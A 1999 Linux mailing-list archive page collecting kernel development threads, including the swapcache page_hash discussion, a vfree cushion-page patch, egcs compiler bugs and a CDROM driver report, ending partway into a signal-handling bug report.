What's happening is I think the same as what happens on the iMac: when
you run the BootX app to boot linux, and it asks macos to shut down,
macos shuts down the awacs, in such a fashion that the only thing that
will start it up again is a hard reset. :-(  If you do

     cat /proc/device-tree/pci/mac-io/davbus/awacs/compatible

and you see a string including "burgundy", that's the problem.

I have managed to work out quite a bit about the burgundy so far.
Its registers can be read as well as written, unlike the earlier
awacses, which makes it much easier to work out what macos is doing.
Shortly I expect to have a new dmasound.c which will support the
burgundy properly.

Paul.


^ permalink raw reply	[relevance 64%]

* CDROM driver bug?
@ 1999-02-03  2:23 63% Sean Harding
  0 siblings, 0 replies; 200+ results
From: Sean Harding @ 1999-02-03  2:23 UTC (permalink / raw)
  To: linuxppc-dev; +Cc: linuxppc-user


I'm having some trouble with the CD driver in the current (2.2.1) kernel.
I have an "enhanced CD" which it won't play as an audio CD. xmcd can
access it enough to identify it with CDDB, but clicking 'play' produces
this message in the log:

Feb  2 18:15:29 juliet kernel: sr0: CDROM (ioctl) error, command:
UNKNOWN(0x47) 00 00 00 02 00 45 1d 08 00 
Feb  2 18:15:29 juliet kernel: extra data not valid Current error sr00:00:
sense key Blank Check
Feb  2 18:15:29 juliet kernel: Additional sense indicates Illegal mode for
this track

cdp says:

play(150,312674)
                msf = 0:2:0 69:28:74
                                    CDROMPLAYMSF: I/O error

Since this disc works properly in every other player and OS I've tried, my
best guess is that it is a bug in the CD driver code. I have an Apple 8x
CDROM drive (the 1200i, I believe).

Any ideas on how to fix this?

sean

-- 
Sean Harding sharding@oregon.uoregon.edu|"art may imitate life
http://gladstone.uoregon.edu/~sharding/ | but life imitates t.v."
Consulting: http://www.efn.org/~seanh/  | --ani difranco



^ permalink raw reply	[relevance 63%]

* swapcache bug?
@ 1999-02-07 18:21 64% Manfred Spraul
  1999-02-07 21:30 64% ` Eric W. Biederman
  1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
  0 siblings, 2 replies; 200+ results
From: Manfred Spraul @ 1999-02-07 18:21 UTC (permalink / raw)
  To: linux-mm@kvack.org

I'm currently debugging my physical memory ramdisk, and I see lots of
entries in the page cache that have 'page->offset' which aren't
multiples of 4096. (they are multiples of 256)
All of them belong to swapper_inode.

If this is the intended behaviour, then page_hash() should be changed:
it assumes that 'page->offset' is a multiple of 4096.

If this should not happen, please ask me for further details.

Note that there is NO crash, just lots of entries with the same hash
value.
---
- 2.2.1 kernel
- 12 MB Ram
- 72256 kB Swap-partition
---
	Manfred
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
@ 1999-02-08 17:32 64%   ` Linus Torvalds
  1999-02-08 17:51 60%     ` Stephen C. Tweedie
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-02-08 17:32 UTC (permalink / raw)
  To: Stephen C. Tweedie; +Cc: masp0008, linux-mm@kvack.org


On Mon, 8 Feb 1999, Stephen C. Tweedie wrote:
> 
> Good point, the line include/linux/pagemap.h:39,
> 
> 	return s(i+o) & (PAGE_HASH_SIZE-1);
> 
> should probably be 
> 
> 	return s(i+o+offset) & (PAGE_HASH_SIZE-1);
> 
> to mix in the low order bits for swap entries.  Well spotted.  Anyone
> see anything wrong with this one-liner change?

Yes, the above will potentially result in different hash entries for the
same page, which means that we now have aliasing and basically just random
behaviour. 

It _may_ be that the hash function is always called with a page-aligned
offset, but that was not how it was strictly meant to be: the way the
thing was envisioned you could just find the page at "offset" by doing

	page_hash(inode,offset)

without page-aligning offset before you did this.

If anything, maybe the swap cache should just use the high bits in the
"offset" field (or at least prefer to do so: something like

	page->offset = swap_entry_to_offset(entry);

and 
	entry = offset_to_swap_entry(page->offset);

that does a PAGE_MASK_BITS rotate on the bits..
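
A minimal sketch of the rotation idea above, assuming the swap entry fits in an unsigned long and a 4 kB page (PAGE_SHIFT = 12). The message only names the two helpers; their bodies here are hypothetical, written as a plain bit rotate so that the entry's low bits end up in the part of the offset that page_hash() actually looks at:

```c
#include <limits.h>

/* Assumed values for illustration; not taken from any kernel header. */
#define PAGE_SHIFT 12
#define WORD_BITS  ((unsigned int)(sizeof(unsigned long) * CHAR_BIT))

/* Hypothetical helper: rotate the swap entry left by PAGE_SHIFT bits,
 * so its low bits move above the page-offset bits. */
static unsigned long swap_entry_to_offset(unsigned long entry)
{
	return (entry << PAGE_SHIFT) | (entry >> (WORD_BITS - PAGE_SHIFT));
}

/* Hypothetical inverse: rotate right by PAGE_SHIFT bits. */
static unsigned long offset_to_swap_entry(unsigned long offset)
{
	return (offset >> PAGE_SHIFT) | (offset << (WORD_BITS - PAGE_SHIFT));
}
```

Because a rotate loses no bits, the conversion is reversible for every entry value, which is what lets the swap cache keep storing the full entry in page->offset.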

		Linus


^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 17:32 64%   ` Linus Torvalds
@ 1999-02-08 17:51 60%     ` Stephen C. Tweedie
  1999-02-08 18:48 62%       ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: Stephen C. Tweedie @ 1999-02-08 17:51 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org

Hi,

On Mon, 8 Feb 1999 09:32:24 -0800 (PST), Linus Torvalds
<torvalds@transmeta.com> said:

> It _may_ be that the hash function is always called with a page-aligned
> offset, but that was not how it was strictly meant to be: the way the
> thing was envisioned you could just find the page at "offset" by doing

> 	page_hash(inode,offset)

It does appear to be: we enforce it pretty much everywhere I can see,
with one possible exception: filemap_nopage(), which assumes
area->vm_offset is already page-aligned.  I think we can still violate
that internally if we are mapping a ZMAGIC binary (urgh), but the VM
breaks anyway if we do that: update_vm_cache cannot deal with such
pages, for a start.

The assumption that we might have flexible offsets will break
__find_page massively anyway, because we _always_ lookup the struct page
by exact match on the offset; __find_page never tries to align things
itself.

Linus, I know Matti Aarnio has been working on supporting >32bit offsets
on Intel, and for that we really do need to start using the low bits in
the page offset for something more useful than MBZ padding.  If there is
a long-term desire to keep those bits in the offset insignificant then
that will really hurt his work; otherwise, I can't see mixing in the
low-order bits to the page hash breaking anything new.

> If anything, maybe the swap cache should just use the high bits in the
> "offset" field 

Yes, we can certainly do that to fix the current hash collision problems,
but since there are long term reasons for using more bits of
significance in the page cache offset, it would be good to know whether
you'd be willing to entertain that possibility.  If so, we'll need a
hash function which observes the low bits anyway.

--Stephen

^ permalink raw reply	[relevance 60%]

* Re: swapcache bug?
  1999-02-07 18:21 64% swapcache bug? Manfred Spraul
@ 1999-02-07 21:30 64% ` Eric W. Biederman
  1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
  1 sibling, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-02-07 21:30 UTC (permalink / raw)
  To: masp0008; +Cc: linux-mm@kvack.org

>>>>> "MS" == Manfred Spraul <masp0008@stud.uni-sb.de> writes:

MS> I'm currently debugging my physical memory ramdisk, and I see lots of
MS> entries in the page cache that have 'page->offset' which aren't
MS> multiples of 4096. (they are multiples of 256)
MS> All of them belong to swapper_inode.

MS> If this is the intended behaviour, then page_hash() should be changed:
MS> it assumes that 'page->offset' is a multiple of 4096.

Yes.  Because for the swap cache we store the swap entry, which already
has the page size shifted out of it, but it's also set up so you can store
it directly in a pte, which means some 0 bits.

Good spotting, but unless someone can show a significant performance impact 
changing page_hash should wait for 2.3.

Eric

^ permalink raw reply	[relevance 64%]

* [PATCH] Re: swapcache bug?
  1999-02-07 18:21 64% swapcache bug? Manfred Spraul
  1999-02-07 21:30 64% ` Eric W. Biederman
@ 1999-02-08 16:39 64% ` Stephen C. Tweedie
  1999-02-08 17:32 64%   ` Linus Torvalds
  1 sibling, 1 reply; 200+ results
From: Stephen C. Tweedie @ 1999-02-08 16:39 UTC (permalink / raw)
  To: masp0008, Linus Torvalds; +Cc: linux-mm@kvack.org, Stephen Tweedie

Hi,

On Sun, 07 Feb 1999 19:21:38 +0100, Manfred Spraul
<masp0008@stud.uni-sb.de> said:

> I'm currently debugging my physical memory ramdisk, and I see lots of
> entries in the page cache that have 'page->offset' which aren't
> multiples of 4096. (they are multiples of 256)
> All of them belong to swapper_inode.

That is normal.

> If this is the intended behaviour, then page_hash() should be changed:
> it assumes that 'page->offset' is a multiple of 4096.

Good point, the line include/linux/pagemap.h:39,

	return s(i+o) & (PAGE_HASH_SIZE-1);

should probably be 

	return s(i+o+offset) & (PAGE_HASH_SIZE-1);

to mix in the low order bits for swap entries.  Well spotted.  Anyone
see anything wrong with this one-liner change?
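
To see the effect in numbers, here is a toy user-space model of the two variants. It is only a sketch: the 11-bit table size, the definitions of o and s(), and the inode term being 0 are assumptions made for illustration, not copied from pagemap.h. It counts how many distinct buckets a run of offsets that are multiples of 256 lands in:

```c
#include <string.h>

/* Assumed values for illustration only. */
#define PAGE_SHIFT     12
#define PAGE_HASH_BITS 11
#define PAGE_HASH_SIZE (1UL << PAGE_HASH_BITS)

/* Models s(x): fold the high bits back into the low ones. */
static unsigned long fold(unsigned long x)
{
	return x + (x >> PAGE_HASH_BITS);
}

/* Models s(i+o): only the page-number part of the offset is hashed. */
static unsigned long hash_high_only(unsigned long i, unsigned long offset)
{
	return fold(i + (offset >> PAGE_SHIFT)) & (PAGE_HASH_SIZE - 1);
}

/* Models s(i+o+offset): the low-order offset bits are mixed in as well. */
static unsigned long hash_with_low(unsigned long i, unsigned long offset)
{
	return fold(i + (offset >> PAGE_SHIFT) + offset) & (PAGE_HASH_SIZE - 1);
}

/* Count distinct buckets hit by n offsets spaced 256 bytes apart. */
static unsigned int count_buckets(unsigned long (*hash)(unsigned long, unsigned long),
				  unsigned int n)
{
	unsigned char used[PAGE_HASH_SIZE];
	unsigned int k, count = 0;

	memset(used, 0, sizeof(used));
	for (k = 0; k < n; k++) {
		unsigned long bucket = hash(0, (unsigned long)k * 256);

		if (!used[bucket]) {
			used[bucket] = 1;
			count++;
		}
	}
	return count;
}
```

Calling count_buckets(hash_high_only, 1024) and count_buckets(hash_with_low, 1024) compares the spread: in this model the first variant maps every 16 consecutive entries to the same bucket, because the bits that distinguish them are shifted away.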

--Stephen

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 17:51 60%     ` Stephen C. Tweedie
@ 1999-02-08 18:48 62%       ` Linus Torvalds
  1999-02-08 21:13 60%         ` Matti Aarnio
  1999-02-09  7:15 64%         ` Eric W. Biederman
  0 siblings, 2 replies; 200+ results
From: Linus Torvalds @ 1999-02-08 18:48 UTC (permalink / raw)
  To: Stephen C. Tweedie; +Cc: masp0008, linux-mm@kvack.org


On Mon, 8 Feb 1999, Stephen C. Tweedie wrote:
> 
> It does appear to be: we enforce it pretty much everywhere I can see,
> with one possible exception: filemap_nopage(), which assumes
> area->vm_offset is already page-aligned.  I think we can still violate
> that internally if we are mapping a ZMAGIC binary (urgh), but the VM
> breaks anyway if we do that: update_vm_cache cannot deal with such
> pages, for a start.

This was done on purpose: it still works as a mapping, but it isn't
coherent with regards to writes to the file. That's fine, as writing to an
executable while it has been mapped is a losing proposition anyway, and
you can't get access through these non-page-aligned mappings any other way
(the "mmap()" system calls etc will all enforce page-aligned regions,
because coherency just wouldn't be possible otherwise). 

> The assumption that we might have flexible offsets will break
> __find_page massively anyway, because we _always_ lookup the struct page
> by exact match on the offset; __find_page never tries to align things
> itself.

Good point.

> Linus, I know Matti Aarnio has been working on supporting >32bit offsets
> on Intel, and for that we really do need to start using the low bits in
> the page offset for something more useful than MBZ padding. 

Yes. The page offset will become a "sector offset" (I'd actually like to
make it a page number, but then I'd have to break ZMAGIC dynamic loading
due to the fractional page offsets, so it's not worth it for three extra
bits), and that gives you 41 bits of addressing even on a 32-bit machine.
Which is plenty - considering that by the time you need more than that
you'd _really_ better be running on a larger machine anyway. 

Note that some patches I saw (I think by Matti) made "page->offset" a long
long, and that is never going to happen. That's just a stupid waste of
time and memory.

>						 If there is
> a long-term desire to keep those bits in the offset insignificant then
> that will really hurt his work; otherwise, I can't see mixing in the
> low-order bits to the page hash breaking anything new.

Ok, you convinced me. 

		Linus


^ permalink raw reply	[relevance 62%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 18:48 62%       ` Linus Torvalds
@ 1999-02-08 21:13 60%         ` Matti Aarnio
  1999-02-09  7:15 64%         ` Eric W. Biederman
  1 sibling, 0 replies; 200+ results
From: Matti Aarnio @ 1999-02-08 21:13 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: sct, masp0008, linux-mm

Linus Torvalds <torvalds@transmeta.com> wrote:
...
> > Linus, I know Matti Aarnio has been working on supporting >32bit offsets
> > on Intel, and for that we really do need to start using the low bits in
> > the page offset for something more useful than MBZ padding. 
> 
> Yes. The page offset will become a "sector offset" (I'd actually like to
> make it a page number, but then I'd have to break ZMAGIC dynamic loading
> due to the fractional page offsets, so it's not worth it for three extra
> bits), and that gives you 41 bits of addressing even on a 32-bit machine.
> Which is plenty - considering that by the time you need more than that
> you'd _really_ better be running on a larger machine anyway. 

	I forgot (didn't log), who sent me a patch to my L-F-S stuff
	for ZMAGIC page mis-alignment report.  (It was somebody here
	at linux-mm list)  His comment was that only *very old* systems
	contain ZMAGIC files with alignments not already in page
	granularity.

	Given certain limitations in low-level block drivers, using that
	'sector index' idea might be worthwhile.  It gives us essentially up
	to 512 * 4GB or 2 TB file sizes, which matches current low-level
	limitations.

	However, now doing page offset work, we might need to mask the low
	bits of the sector index to do page cache searches.  (Unless the
	alignment is always guaranteed ?)
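
A small worked sketch of the arithmetic above, assuming 512-byte sectors, 4 kB pages and a 32-bit index; the helper names are made up for illustration. A 32-bit sector index covers 2^32 * 2^9 = 2^41 bytes, and masking the low three bits of the index gives the sector at which the containing page starts:

```c
/* Assumed sizes for illustration. */
#define SECTOR_SHIFT     9	/* 512-byte sectors */
#define PAGE_SHIFT       12	/* 4 kB pages */
#define SECTORS_PER_PAGE (1UL << (PAGE_SHIFT - SECTOR_SHIFT))

/* Bytes addressable with a 32-bit sector index: 2^32 sectors * 512 bytes. */
static unsigned long long max_file_bytes(void)
{
	return (1ULL << 32) << SECTOR_SHIFT;
}

/* Hypothetical helper: round a sector index down to the first sector
 * of the page that contains it, e.g. before a page cache lookup. */
static unsigned long page_aligned_sector(unsigned long sector)
{
	return sector & ~(SECTORS_PER_PAGE - 1);
}
```

The "three extra bits" mentioned in the quoted text are PAGE_SHIFT - SECTOR_SHIFT, i.e. the bits that this mask clears.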

> Note that some patches I saw (I think by Matti) made "page->offset" a long
> long, and that is never going to happen. That's just a stupid waste of
> time and memory.

	Good heavens! No!  That can't have been mine.

	In my patches the 'page->offset' became an ADT called 'pgoff_t'
	which I used to do compile time trapping of missing conversions.
	When simplified ("#if 1" -> "#if 0" in <linux/mm.h> header file),
	the type is just 'u_long'.

	I don't think you have seen my patches, I have posted the URL,
	but not the patches themselves.

	With recent talks in linux-kernel about internal VFS ABI stability
	being an issue, my current L-F-S patch is *not* ready for 2.2.*.
	It changes one thing, and adds another in the inode_operations
	structure, plus adds a field into 'struct task'.

	I would wait a bit until 2.3 opens, collect a bit of experience
	of it there, and then backport (without doing VFS ABI changes) to
	2.2.*.    Otherwise: "Damn the torpedoes!  Full steam ahead!".
	(And we would hear lots of noisy torpedoes...)

... 
> 		Linus

/Matti Aarnio <matti.aarnio@sonera.fi>

^ permalink raw reply	[relevance 60%]

* MIPS egcs bug, was: working modutils for DECStation Linux ??
       [not found]     <199902071436.PAA11929@sparta.research.kpn.com>
@ 1999-02-08  5:12 64% ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1999-02-08  5:12 UTC (permalink / raw)
  To: Karel van Houten; +Cc: linux, linux-mips, linux-mips

On Sun, Feb 07, 1999 at 03:36:40PM +0100, Karel van Houten wrote:

> The '#ident' line makes the array initialisation incorrect. After removing
> this line, depmod compiles and works correctly.

Thanks for tracking this down.

> EGCS guru's, any hints?

Adding this to egcs-1.0.2/gcc/config/mips/linux.h at the bottom should
fix things:

/* Attach a special .ident directive to the end of the file to identify
   the version of GCC which compiled this code.  The format of the
   .ident string is patterned after the ones produced by native svr4
   C compilers.  */

#undef IDENT_ASM_OP
#define IDENT_ASM_OP ".ident"

/* Output #ident as a .ident.  */

#undef ASM_OUTPUT_IDENT
#define ASM_OUTPUT_IDENT(FILE, NAME) \
  fprintf (FILE, "\t%s\t\"%s\"\n", IDENT_ASM_OP, NAME);

I'll test this and make a real patch later.  Until then, -fno-ident is the
silver bullet to avoid such sick effects.

IRIX people: I think the same bug also hits IRIX, RISC/os and others;
it has probably been in gcc / egcs for as long as I can remember.  At least
for some of the affected targets the above fix cannot be used.

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 18:48 62%       ` Linus Torvalds
  1999-02-08 21:13 60%         ` Matti Aarnio
@ 1999-02-09  7:15 64%         ` Eric W. Biederman
  1999-02-09 16:32 64%           ` Linus Torvalds
  1 sibling, 1 reply; 200+ results
From: Eric W. Biederman @ 1999-02-09  7:15 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> Yes. The page offset will become a "sector offset" (I'd actually like to
LT> make it a page number, but then I'd have to break ZMAGIC dynamic loading
LT> due to the fractional page offsets, so it's not worth it for three extra
LT> bits), and that gives you 41 bits of addressing even on a 32-bit machine.
LT> Which is plenty - considering that by the time you need more than that
LT> you'd _really_ better be running on a larger machine anyway. 

???  With the later OMAGIC format everything is page aligned already.

I have a patch that removes page sharing support from ZMAGIC but keeps
everything functional.  Tested with a OMAGIC libc ZMAGIC doom and
ZMAGIC Xlibs.   This is on my queue for submission to 2.3.

Eric

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-09  7:15 64%         ` Eric W. Biederman
@ 1999-02-09 16:32 64%           ` Linus Torvalds
  1999-02-10  0:28 55%             ` Eric W. Biederman
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-02-09 16:32 UTC (permalink / raw)
  To: Eric W. Biederman; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org


On 9 Feb 1999, Eric W. Biederman wrote:
> 
> ???  With the later OMAGIC format everything is page aligned already.

Yes.

However, it's a question of pride too. I don't want to break "normal" user
land applications (as opposed to things like "ifconfig" that are really
very very special), unless I really have to.

As such, I want to support even the old 1kB-aligned ZMAGIC binaries for as
long as it's not a liability, and quite frankly the issue of whether you
make the page cache "offset" be a sector or a page offset is purely a
thing of taste, not a liability.

			Linus


^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-09 16:32 64%           ` Linus Torvalds
@ 1999-02-10  0:28 55%             ` Eric W. Biederman
  0 siblings, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-02-10  0:28 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> On 9 Feb 1999, Eric W. Biederman wrote:
>> 
>> ???  With the later OMAGIC format everything is page aligned already.

LT> Yes.

LT> However, it's a question of pride too. I don't want to break "normal" user
LT> land applications (as opposed to things like "ifconfig" that are really
LT> very very special), unless I really have to.

You don't have to break programs, just have them use a little more memory.

The way we currently support shared ZMAGIC binaries is a real hack.
There are a lot of cases where it doesn't work: 2k+ ext2fs and
network file systems.

And the code is very unobvious.

The filesystem code becomes much cleaner if we remove support for
non-aligned mappings.

The following patch is all that it takes to remove the need to support
non-aligned mappings.  Everything still works; we just use a little
more memory (if multiple copies of the program are running at once),
and complain.

Avoiding this patch is not worth losing 3 bits of address space, and
code clarity.  
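
For readers not used to the idiom, the test the patch relies on can be sketched in user space as follows. PAGE_SIZE is assumed to be 4 kB, PAGE_MASK is defined the way the kernel defines it (all bits above the in-page offset), and is_page_aligned() is a made-up name for illustration:

```c
/* Assumed 4 kB pages; PAGE_MASK keeps the page-number bits. */
#define PAGE_SIZE 4096UL
#define PAGE_MASK (~(PAGE_SIZE - 1))

/* Hypothetical helper: non-zero when no in-page offset bits are set. */
static int is_page_aligned(unsigned long offset)
{
	return (offset & ~PAGE_MASK) == 0;
}
```

A text offset of 1024, as in the old 1kB-aligned ZMAGIC binaries, fails this check, so such a binary would take the read-into-anonymous-memory path instead of being mmap()ed.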

Eric

diff -uNrX linux-ignore-files linux-2.1.132.eb2/fs/binfmt_aout.c linux-2.1.132.eb3.make/fs/binfmt_aout.c
--- linux-2.1.132.eb2/fs/binfmt_aout.c	Fri Dec 25 16:42:47 1998
+++ linux-2.1.132.eb3.make/fs/binfmt_aout.c	Fri Dec 25 22:42:36 1998
@@ -409,7 +409,14 @@
 			return fd;
 		file = fcheck(fd);
 
-		if (!file->f_op || !file->f_op->mmap) {
+		if ((fd_offset & ~PAGE_MASK) != 0) {
+			printk(KERN_WARNING 
+			       "fd_offset is not page aligned. Please convert program: %s\n",
+			       file->f_dentry->d_name.name
+			       );
+		}
+
+		if (!file->f_op || !file->f_op->mmap || ((fd_offset & ~PAGE_MASK) != 0)) {
 			sys_close(fd);
 			do_mmap(NULL, 0, ex.a_text+ex.a_data,
 				PROT_READ|PROT_WRITE|PROT_EXEC,
@@ -530,6 +537,24 @@
 
 	start_addr =  ex.a_entry & 0xfffff000;
 
+	if ((N_TXTOFF(ex) & ~PAGE_MASK) != 0) {
+		printk(KERN_WARNING 
+		       "N_TXTOFF is not page aligned. Please convert library: %s\n",
+		       file->f_dentry->d_name.name
+		       );
+		
+		do_mmap(NULL, start_addr & PAGE_MASK, ex.a_text + ex.a_data + ex.a_bss,
+			PROT_READ | PROT_WRITE | PROT_EXEC,
+			MAP_FIXED| MAP_PRIVATE, 0);
+		
+		read_exec(file->f_dentry, N_TXTOFF(ex),
+			  (char *)start_addr, ex.a_text + ex.a_data, 0);
+		flush_icache_range((unsigned long) start_addr,
+				   (unsigned long) start_addr + ex.a_text + ex.a_data);
+
+		retval = 0;
+		goto out_putf;
+	}
 	/* Now use mmap to map the library into memory. */
 	error = do_mmap(file, start_addr, ex.a_text + ex.a_data,
 			PROT_READ | PROT_WRITE | PROT_EXEC,
diff -uNrX linux-ignore-files linux-2.1.132.eb2/mm/filemap.c linux-2.1.132.eb3.make/mm/filemap.c
--- linux-2.1.132.eb2/mm/filemap.c	Fri Dec 25 16:48:50 1998
+++ linux-2.1.132.eb3.make/mm/filemap.c	Fri Dec 25 23:04:10 1998
@@ -1350,7 +1350,7 @@
 			return -EINVAL;
 	} else {
 		ops = &file_private_mmap;
-		if (vma->vm_offset & (inode->i_sb->s_blocksize - 1))
+		if (vma->vm_offset & (PAGE_SIZE - 1))
 			return -EINVAL;
 	}
 	if (!inode->i_sb || !S_ISREG(inode->i_mode))




^ permalink raw reply	[relevance 55%]

* Linux 2.2.1 and 2.2.0-pre5 bug
@ 1999-02-14 22:50 64% ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1999-02-14 22:50 UTC (permalink / raw)
  To: linux, linux-mips, linux-mips

Hi,

I'm about to commit Linux 2.2.1 into CVS.  I received email from people who
were attempting to upgrade their older 2.1.131 sources themselves and ran
into a problem with 2.2.2-pre5.  Well, I fixed that problem in my sources,
which are going to CVS, so try these sources.

  Ralf

^ permalink raw reply	[relevance 64%]

* PATCH - bug in vfree
@ 1999-02-20 11:46 62% Neil Booth
  1999-02-20 12:14 64% ` Neil Booth
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Neil Booth @ 1999-02-20 11:46 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Alan Cox, linux-mm

[-- Attachment #1: Type: text/plain, Size: 1150 bytes --]

Linus,

I posted this bug on the kernel mailing list last year, but it never got
fixed, probably as I didn't include a patch. I attach a patch this time
against kernel 2.2.1. The bug is rare, but can lead to kernel virtual
memory corruption.

Quick description:- vfree forgets to subtract the extra cushion page
from the size of each virtual memory area stored in vmlist when it calls
vmfree_area_pages. This means that only the  vmalloc-requested size is
allocated by vmalloc_area_pages, but the requested size PLUS the cushion
page is freed by vmfree_area_pages.
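
The size mismatch can be written down as a toy model. This is a sketch only: the struct and function names are invented for illustration, requests are assumed to be whole pages, and nothing here touches real page tables. It just counts pages on the allocate and free sides:

```c
/* Assumed 4 kB pages. */
#define PAGE_SIZE 4096UL

/* Toy stand-in for a vmlist entry: size includes the cushion page. */
struct vm_area_model {
	unsigned long size;
};

/* Models the bookkeeping: recorded size = request + one cushion page. */
static struct vm_area_model model_get_vm_area(unsigned long request)
{
	struct vm_area_model area;

	area.size = request + PAGE_SIZE;
	return area;
}

/* Pages actually mapped on allocation: only the requested size. */
static unsigned long pages_mapped(unsigned long request)
{
	return request / PAGE_SIZE;
}

/* Pages unmapped when the recorded size is passed through unchanged. */
static unsigned long pages_unmapped_buggy(const struct vm_area_model *area)
{
	return area->size / PAGE_SIZE;
}

/* Pages unmapped when the cushion page is subtracted first. */
static unsigned long pages_unmapped_fixed(const struct vm_area_model *area)
{
	return (area->size - PAGE_SIZE) / PAGE_SIZE;
}
```

For a three-page request the model maps three pages but the unadjusted free path covers four, which is the one-page overshoot described above.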

More deeply:- Close inspection of get_vm_area reveals that
(intentionally?) it does NOT insist there be a cushion page behind a VMA
that is placed in front of a previously-allocated VMA, it ONLY
guarantees that a cushion page lies in front of newly-allocated VMAs.
Thus two VMAs could be immediately adjacent without a cushion page, and
coupled with the vfree bug means that vfree-ing the first VMA also frees
the first page of the second VMA, with dire consequences.

I have described this as clearly as I can, I hope it makes sense. Alan,
this same bug also exists in 2.0.36.

Neil.

[-- Attachment #2: vfree-patch --]
[-- Type: text/plain, Size: 384 bytes --]

--- linux/mm/vmalloc.c~	Sun Jan 24 19:21:06 1999
+++ linux/mm/vmalloc.c	Sat Feb 20 20:17:11 1999
@@ -187,7 +187,7 @@
 	for (p = &vmlist ; (tmp = *p) ; p = &tmp->next) {
 		if (tmp->addr == addr) {
 			*p = tmp->next;
-			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size);
+			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size - PAGE_SIZE);
 			kfree(tmp);
 			return;
 		}

^ permalink raw reply	[relevance 62%]

* Re: PATCH - bug in vfree
  1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
@ 1999-02-20 12:14 64% ` Neil Booth
  1999-02-27  2:39 64%   ` Neil Booth
  1999-02-22 20:31 64% ` Kanoj Sarcar
  1999-02-25  0:47 64% ` Andrea Arcangeli
  2 siblings, 1 reply; 200+ results
From: Neil Booth @ 1999-02-20 12:14 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Alan Cox, linux-mm

Neil Booth wrote:

> More deeply:- Close inspection of get_vm_area reveals that
> (intentionally?) it does NOT insist there be a cushion page behind a VMA
> that is placed in front of a previously-allocated VMA, it ONLY
> guarantees that a cushion page lies in front of newly-allocated VMAs.

Sorry, this is not correct (mistook < for <=). The bug report is
correct, though.

Neil.

^ permalink raw reply	[relevance 64%]

* egcs-1.1.1-1c bug (was Re: major ksyms problem)
       [not found]     <Pine.LNX.4.05.9902220432430.2138-100000@localhost.erols.com>
@ 1999-02-22 14:36 64% ` Tom Vier
  1999-02-23  7:22 64%   ` Gary Thomas
       [not found]     ` <Pine.LNX.4.05.9902220928100.405-100000@localhost.erols.com >
  1 sibling, 1 reply; 200+ results
From: Tom Vier @ 1999-02-22 14:36 UTC (permalink / raw)
  To: Tom Vier; +Cc: mklinux-development-system, mklinux-setup, linuxppc-dev


it's an egcs bug. i think it's not aligning instructions properly, cuz
i believe the 601 is more strict about alignment. is anyone having
problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
machine built under pre-R5 (egcs-1.1.1-1c)?

i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
they worked perfectly.

egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
it adds an offset table symbol that makes insmod complain.

is this a known problem?

> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
> > Unhandled relocation of type 26 for .L343

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/




^ permalink raw reply	[relevance 64%]

* I believe I found a bug in /arch/ppc/kernel/signal.c
@ 1999-02-22 14:36 59% D.J. Barrow
  1999-02-22 18:53 64% ` Benjamin Herrenschmidt
  0 siblings, 1 reply; 200+ results
From: D.J. Barrow @ 1999-02-22 14:36 UTC (permalink / raw)
  To: Gary Thomas; +Cc: linuxppc-dev


Hi Gary/Others,
I'm currently using 2.1.123 (yup, I know this is old, but from reading
the source the bug is still in 2.1.124 DR4) and it is possibly still
there. Unfortunately my net connection isn't good enough to download
the latest 2.2 stuff in less than a few hours.

The bug manifested itself in tftp, when longjmp'ing out
of the signal handler on timeouts.

Resulting in....
a) sys_sigreturn not getting called
b) signals queued & trampoline stuff on the user stack being trashed.
c) SIGALRM being blocked forever.
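
For comparison, this is what the user-space side of the pattern looks like when written with the POSIX sigsetjmp()/siglongjmp() pair. It is a sketch, not the tftp source and not a kernel fix: the function and variable names are invented, and raise() stands in for a real alarm() timeout. With a non-zero savemask argument the signal mask is restored on the jump, so SIGALRM does not stay blocked even though the handler never returns:

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <string.h>

static sigjmp_buf timeout_env;

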